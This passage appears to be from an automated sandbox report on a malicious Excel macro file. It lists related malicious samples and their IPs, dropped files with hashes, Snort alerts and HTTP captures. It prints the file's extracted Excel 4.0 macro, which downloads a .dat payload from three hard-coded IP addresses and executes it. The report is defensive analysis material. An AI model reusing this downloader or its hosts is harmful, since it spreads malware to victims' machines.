                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 190.14.37.121
                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 190.14.37.121
                Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                Overdue_Debt_829721407_06012021.xlsmGet hashmaliciousBrowse
                • 190.14.37.113
                Overdue_Debt_829721407_06012021.xlsmGet hashmaliciousBrowse
                • 190.14.37.113
                HSAEDecline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 185.117.73.74
                xa6FEoUw0W.dllGet hashmaliciousBrowse
                • 188.116.36.211
                tszs3mwUbe.exeGet hashmaliciousBrowse
                • 185.45.193.29
                pZ50mMKSLi.exeGet hashmaliciousBrowse
                • 185.45.193.29
                qTnwCotzR9.exeGet hashmaliciousBrowse
                • 185.45.193.29
                PwBsqWQ7jJ.exeGet hashmaliciousBrowse
                • 185.45.193.29
                aGDehjYIws.exeGet hashmaliciousBrowse
                • 185.198.57.204
                Tjhsm8p85Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                T23HJFoN2Y.exeGet hashmaliciousBrowse
                • 185.45.193.29
                i7NsO9mhTD.exeGet hashmaliciousBrowse
                • 185.45.193.29
                o7w2HSi17V.exeGet hashmaliciousBrowse
                • 185.141.27.225
                AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exeGet hashmaliciousBrowse
                • 185.198.57.204
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 194.36.189.154
                xax2K3BWhm.exeGet hashmaliciousBrowse
                • 185.45.192.246
                Cancellation_480942562_06082021.xlsmGet hashmaliciousBrowse
                • 185.45.192.236
                Cancellation_480942562_06082021.xlsmGet hashmaliciousBrowse
                • 185.45.192.236

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A07B784.jpg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                Category:dropped
                Size (bytes):139381
                Entropy (8bit):7.677272725029824
                Encrypted:false
                SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                MD5:53918FB868F1540920FC189C6783FC7C
                SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                Malicious:false
                Reputation:low
                Preview: ....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                C:\Users\user\AppData\Local\Temp\BECE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664520146264211
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO46M:cng4P4346PgZw9gQad
                MD5:E7FF0DFAC948EB9E3F28829A03D3CF9F
                SHA1:DE0BB99F512724500B07FE16A497934D9B2F3455
                SHA-256:1C614F666606155F93B4EC6462A3FF9196574F1527943EEC11435396B598B0D4
                SHA-512:DD3E1F81FEBF93235D9A6BFCAB0641C0C92FF6B4B234B10DF43B14FFE6C8E99CDB086B7AA142F08CF6FCC786F77474D697CD65EE975B5A1CBEC17E1B54D74D88
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Jun 25 20:06:38 2021, atime=Fri Jun 25 20:06:38 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.501022480561873
                Encrypted:false
                SSDEEP:12:85QfLgXg/XAlCPCHaXtB8XzB/twX+WnicvbDS9bDtZ3YilMMEpxRljKHUmn6TdJU:85A/XTd6jkYeihDv3qGnirNru/
                MD5:F1455988FC9FAE5664C5753629ED52BB
                SHA1:6747F36980BE6E1AFF19D8B9F7B7C48997286F85
                SHA-256:2019327C54A56F28B2B0AE5DE5681398F7D8CC190310DD0F6DC6A7D7CEC6824C
                SHA-512:8F4005A91D7D645EA55846348B081CF56F1145650674284AD834626CEC1EDCB7A6B6C2B1BDACC31F9F13668193F81ECEA6527D3DB2F4D844E267AD836E4A8276
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G..>w...j..>w...j... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R...Desktop.d......QK.X.R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-414467145-06252021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Fri Jun 25 20:06:38 2021, atime=Fri Jun 25 20:06:38 2021, length=153117, window=hide
                Category:dropped
                Size (bytes):2228
                Entropy (8bit):4.555970335453609
                Encrypted:false
                SSDEEP:48:8Hf1W/XT0jFL1SaRS8GiQh2Hf1W/XT0jFL1SaRS8GiQ/:8Hf1W/XojFLnGiQh2Hf1W/XojFLnGiQ/
                MD5:16864E7220CE49809E8CB699A24889CB
                SHA1:15CC58A077446427D87345619805CCAA08ED64A8
                SHA-256:DF8F15797890F5E20498C2E87BA020FACE211A7EF8FE013289C7F7E5D5AEF30C
                SHA-512:B94AC86B7136C833B76D264F21C560C8CE9086440C526EBB5D07B6F6A37CC42A99B1AAED41E956E939F09CF1784F342FB943CE74130493151E9C4AB93B99A49F
                Malicious:false
                Reputation:low
                Preview: L..................F.... ......{..>w...j.._....j...V...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...R. .PERMIS~1.XLS..r.......Q.y.Q.y*...8.....................P.e.r.m.i.s.s.i.o.n.-.4.1.4.4.6.7.1.4.5.-.0.6.2.5.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\Permission-414467145-06252021.xlsm.9.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.4.1.4.4.6.7.1.4.5.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):142
                Entropy (8bit):4.642670559637109
                Encrypted:false
                SSDEEP:3:oyBVomxW+LxCRTnv5NUltLxCRTnv5NUlmxW+LxCRTnv5NUlv:djHC5vI/FC5vIaC5vI1
                MD5:DAC8913182CCB2EAEA86304F342799F4
                SHA1:394074391582ABC7A7F67CB563FC01E438712E12
                SHA-256:F287F47508BBBDFC7A95F43C0F435981E1EEDADBBF48926265E42EA173C07199
                SHA-512:EF9B7E2A51367E553A3116022DBE8FE56E7845FE79B05902048FF6C3C409BECFAA9C7C59AA64E8BB8BF3A7AEE0A63A6E93A47A3681381578FE181A43728810D5
                Malicious:false
                Reputation:low
                Preview: Desktop.LNK=0..[misc]..Permission-414467145-06252021.LNK=0..Permission-414467145-06252021.LNK=0..[misc]..Permission-414467145-06252021.LNK=0..
                C:\Users\user\Desktop\4FCE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):153117
                Entropy (8bit):7.664520146264211
                Encrypted:false
                SSDEEP:3072:cnxmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO46M:cng4P4346PgZw9gQad
                MD5:E7FF0DFAC948EB9E3F28829A03D3CF9F
                SHA1:DE0BB99F512724500B07FE16A497934D9B2F3455
                SHA-256:1C614F666606155F93B4EC6462A3FF9196574F1527943EEC11435396B598B0D4
                SHA-512:DD3E1F81FEBF93235D9A6BFCAB0641C0C92FF6B4B234B10DF43B14FFE6C8E99CDB086B7AA142F08CF6FCC786F77474D697CD65EE975B5A1CBEC17E1B54D74D88
                Malicious:false
                Reputation:low
                Preview: ...N.0...+....(q.V...X8......41.?y..o..dw..i.{i..3....x..+k.7.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".mlx.r)........%p.L...M..B..T...F.\;V.l~.Q5.!.-E"....H...-Ay.j.u.!.P..$k..5....D......A..*..a........r......i..|..d...`...G....._....r...:..iZ,a%.T]d..2.['..hMh.a....D.].N@../9...I.x@G.{................B...&z..w.....@......L..4.".".zJt`4_.....:T..Y..~.|..F.\)..i........tz?F...D...>N.\].j.1i...}GWO..2..3s ./.j..w.r........PK..........!...&n....o.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\Desktop\~$Permission-414467145-06252021.xlsm
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):330
                Entropy (8bit):1.4377382811115937
                Encrypted:false
                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                MD5:96114D75E30EBD26B572C1FC83D1D02E
                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                Malicious:true
                Reputation:high, very likely benign file
                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                Static File Info

                General

                File type:Microsoft Excel 2007+
                Entropy (8bit):7.666395274852154
                TrID:
                • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                • ZIP compressed archive (8000/1) 16.67%
                File name:Permission-414467145-06252021.xlsm
                File size:153750
                MD5:590ca0e597487dd5ad6c2f1fb64184dd
                SHA1:e141e27af930a2cdeafab2eb20727000de893629
                SHA256:20a72dc5350b296f2857911444fa065f5b0bb437be8d1bc61819cf29828a2955
                SHA512:fceb07823442eccaed6727b3c780fc7fbed475c15ac7131c7921505060b475d511e928c312d22980e40ebf12506d05308b55cc9fc0bc1509b244b435920fdc2e
                SSDEEP:3072:SmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:p4P4346PgZw9gQaVJ
                File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4e2aa8aa4bcbcac

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "Permission-414467145-06252021.xlsm"

                Indicators

                Has Summary Info:
                Application Name:
                Encrypted Document:
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:

                Macro 4.0 Code

                ,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),
                =EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                06/25/21-14:07:18.214699TCP1201ATTACK-RESPONSES 403 Forbidden8049167185.240.103.219192.168.2.22
                06/25/21-14:07:19.251378TCP1201ATTACK-RESPONSES 403 Forbidden8049168190.14.37.3192.168.2.22
                06/25/21-14:07:19.648943TCP1201ATTACK-RESPONSES 403 Forbidden8049169185.183.99.120192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jun 25, 2021 14:07:18.037494898 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 14:07:18.123094082 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 14:07:18.123259068 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 14:07:18.124540091 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 14:07:18.209810972 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 14:07:18.214699030 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 14:07:18.216046095 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 14:07:18.248059988 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 14:07:18.453356028 CEST8049168190.14.37.3192.168.2.22
                Jun 25, 2021 14:07:18.453577042 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 14:07:18.454245090 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 14:07:18.659498930 CEST8049168190.14.37.3192.168.2.22
                Jun 25, 2021 14:07:19.251378059 CEST8049168190.14.37.3192.168.2.22
                Jun 25, 2021 14:07:19.251650095 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 14:07:19.278361082 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 14:07:19.344367027 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 14:07:19.344507933 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 14:07:19.345586061 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 14:07:19.411297083 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 14:07:19.648942947 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 14:07:19.649241924 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 14:08:23.215105057 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 14:08:23.215290070 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 14:08:24.251876116 CEST8049168190.14.37.3192.168.2.22
                Jun 25, 2021 14:08:24.254360914 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 14:08:24.648840904 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 14:08:24.648951054 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 14:09:17.962203026 CEST4916980192.168.2.22185.183.99.120
                Jun 25, 2021 14:09:17.962589979 CEST4916880192.168.2.22190.14.37.3
                Jun 25, 2021 14:09:17.963010073 CEST4916780192.168.2.22185.240.103.219
                Jun 25, 2021 14:09:18.027982950 CEST8049169185.183.99.120192.168.2.22
                Jun 25, 2021 14:09:18.048146963 CEST8049167185.240.103.219192.168.2.22
                Jun 25, 2021 14:09:18.167480946 CEST8049168190.14.37.3192.168.2.22

                HTTP Request Dependency Graph

                • 185.240.103.219
                • 190.14.37.3
                • 185.183.99.120

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249167185.240.103.21980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 14:07:18.124540091 CEST0OUTGET /44372.5879460648.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.240.103.219
                Connection: Keep-Alive
                Jun 25, 2021 14:07:18.214699030 CEST1INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 12:07:18 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249168190.14.37.380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 14:07:18.454245090 CEST1OUTGET /44372.5879460648.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 190.14.37.3
                Connection: Keep-Alive
                Jun 25, 2021 14:07:19.251378059 CEST2INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 12:07:19 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.2249169185.183.99.12080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jun 25, 2021 14:07:19.345586061 CEST3OUTGET /44372.5879460648.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.183.99.120
                Connection: Keep-Alive
                Jun 25, 2021 14:07:19.648942947 CEST4INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Fri, 25 Jun 2021 12:07:34 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 